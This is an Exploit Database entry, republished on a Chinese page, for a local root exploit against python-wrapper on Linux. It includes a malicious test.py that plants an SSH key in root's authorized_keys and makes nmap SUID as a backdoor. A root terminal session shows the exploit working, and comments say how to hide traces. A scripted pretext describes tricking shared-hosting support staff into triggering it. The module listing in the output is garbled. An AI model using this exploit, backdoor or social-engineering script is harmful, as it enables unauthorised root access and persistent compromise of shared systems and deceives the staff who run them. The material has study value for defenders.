python-wrapper – Untrusted Search Path/Code Execution

• Exploit Database
• 15 阅读

• 作者： ShadowHatesYou
  日期： 2012-07-02
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/19523/

• # python-wrapper untrusted search path/code execution vulnerability
  #
  # Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules').
  # A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper 
  # while within a non-priviledged user's work directory. 
  #
  # The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
  # with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not 
  # work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does. 
  #
  #
  # Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually
  # want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
  # which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
  # NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program 
  # with input-output commands.
  #
  #
  # A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment.
  # After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
  # you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
  # "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root* 
  # "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
  #
  #
  # - ShadowHatesYou (Shadow@SquatThis.net)
  # 6/30/12
  
  root@tourian:/home/shadow/python# ls -hl test.py
  -rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
  root@tourian:/home/shadow/python# cat test.py
  #!/bin/python
  import os
  os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
  
  root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
  -rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
  root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
  ls: cannot access /root/.ssh/authorized_keys: No such file or directory
  root@tourian:/home/shadow/python# python-wrapper
  Python 2.7.3 (default, May4 2012, 00:13:26)
  [GCC 4.6.2] on linux2
  Type "help", "copyright", "credits" or "license" for more information.
  >>> help('modules')
  
  Please wait a moment while I gather a list of all available modules...
  
  
  ArgImagePlugin_bisect email pprint
  BaseHTTPServer_codecs encodings pptransport
  Bastion _codecs_cnerrno ppworker
  BdfFontFile _codecs_hkexceptionsprofile
  BeautifulSoup _codecs_iso2022 fcntl pstats
  BeautifulSoupTests_codecs_jpfilecmp pty
  BitTornado_codecs_krfileinput pwd
  BmpImagePlugin_codecs_twfnmatch py_compile
  BufrStubImagePlugin _collectionsformatter pyclbr
  CDROM _cracklib fpformatpydoc
  CGIHTTPServer _csvfractions pydoc_data
  ConfigParser_ctypes ftplibpyexpat
  ContainerIO _ctypes_testfunctools pyrit_cli
  Cookie_curses future_builtins pyximport
  Crypto_curses_panel gamin quopri
  CurImagePlugin_elementtreegcrandom
  Cython_emerge gdbmre
  DLFCN _functoolsgenericpath readline
  DcxImagePlugin_gamingentoolkitrepoman
  DocXMLRPCServer _gv getoptrepr
  EpsImagePlugin_hashlibgetpass resource
  ExifTags_heapqgettext rexec
  FitsStubImagePlugin _hotshotgit_remote_helpersrfc822
  FliImagePlugin_imagingglobrlcompleter
  FontFile_imagingftgrp robotparser
  FpxImagePlugin_imagingmathgvrrdtool
  GbrImagePlugin_io gziprunpy
  GdImageFile _json hashlib scapy
  GifImagePlugin_lcms heapq sched
  GimpGradientFile_ldns hmacscipy
  GimpPaletteFile _locale hotshot select
  GribStubImagePlugin _lsprof htmlentitydefssets
  HTMLParser_md5htmllib setuptools
  Hdf5StubImagePlugin _multibytecodec httplib sgmllib
  IN_multiprocessingihookssha
  IcnsImagePlugin _pyio imaplib shelve
  IcoImagePlugin_random imghdrshlex
  ImImagePlugin _shaimp shutil
  Image _sha256 importlib signal
  ImageChops_sha512 imputil site
  ImageCms_socket inspect smtpd
  ImageColor_sreiosmtplib
  ImageDraw _sslitertools sndhdr
  ImageDraw2_strptime java_config_2 socket
  ImageEnhance_struct javatoolkit spwd
  ImageFile _symtable jsonsre
  ImageFileIO _testcapi keyword sre_compile
  ImageFilter _threading_locallcmssre_constants
  ImageFont _unboundldnssre_parse
  ImageGL _warnings ldnsx ssl
  ImageGrab _weakreflib2to3 stat
  ImageMath _weakrefset libsvnstatvfs
  ImageMode _xmlpluslibxml2 string
  ImageOpsabc libxml2modstringold
  ImagePaletteaifclibxslt stringprep
  ImagePath antigravity libxsltmodstrop
  ImageQt anydbmlinecache struct
  ImageSequence argparselinuxaudiodev subprocess
  ImageShow array localesunau
  ImageStat ast logging sunaudio
  ImageTk asynchatlxmlsvn
  ImageTransformasyncoremacpath symbol
  ImageWinatexitmacurl2path symtable
  ImtImagePluginaudiodevmagic sys
  IptcImagePlugin audioop mailbox sysconfig
  JpegImagePlugin base64mailcap syslog
  McIdasImagePlugin bdb markupbasetabnanny
  MicImagePluginbinasciimarshal tarfile
  MimeWriterbinhexmathtelnetlib
  MpegImagePlugin bisectmd5 tempfile
  MspImagePluginbs4 mhlib termios
  OleFileIO bz2 mimetools test
  OpenIPMIcPickle mimetypes textwrap
  PAM cProfilemimifythis
  PIL cStringIO mirrorselectthread
  PSDrawcalendarmmapthreading
  PaletteFile cgi modulefindertime
  PalmImagePlugin cgitb multifile timeit
  PcdImagePluginchunk multiprocessing toaiff
  PcfFontFile cmath mutex token
  PcxImagePlugincmd netrc tokenize
  PdfImagePlugincodenetsnmp trace
  PixarImagePlugincodecsnew traceback
  PngImagePlugincodeopnis tty
  PpmImagePlugincollections nntplib types
  PsdImagePlugincolorsysntpathunbound
  Queue commandsnturl2pathunboundmodule
  SgiImagePlugincompileallnumbers unicodedata
  SimpleHTTPServercompilernumpy unittest
  SimpleXMLRPCServercontextlibopcodeurllib
  SocketServercookielib operatorurllib2
  SpiderImagePlugin copyoptparseurlparse
  StringIOcopy_regosuser
  SunImagePlugincpyritos2emxpathuu
  TYPES cracklibossaudiodev uuid
  TarIO crypt paramikowarnings
  TiffImagePlugin ctypespdb weakref
  TiffTagscursespicklewebbrowser
  UserDictcythonpickletools whichdb
  UserListdatetimepipes wsgiref
  UserStringdbm pkg_resources xattr
  WalImageFiledecimal pkgutil xcbgen
  WmfImagePlugindifflib platformxdelta3main
  XVThumbImagePlugindircacheplistlibxdrlib
  XbmImagePlugindis popen2xen
  XpmImagePlugindistutils poplibxml
  _LWPCookieJar dnetportage xmllib
  _MozillaCookieJar doctest posix xmlrpclib
  _OpenIPMI drv_libxml2 posixfile xxsubtype
  __builtin__ dumbdbm posixpath yasm
  __future__dummy_threadppzipfile
  _abcoll dummy_threading ppautozipimport
  _asteasy_installppcommonzlib
  
  Enter any module name to get more help.Or, type "modules spam" to search
  for modules whose descriptions contain the word "spam".
  
  >>> quit()
  root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
  -rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
  root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
  ssh-rss pwned byshadow
  
  
  # Wish I had DuoSecurity!
  # See you at Defcon!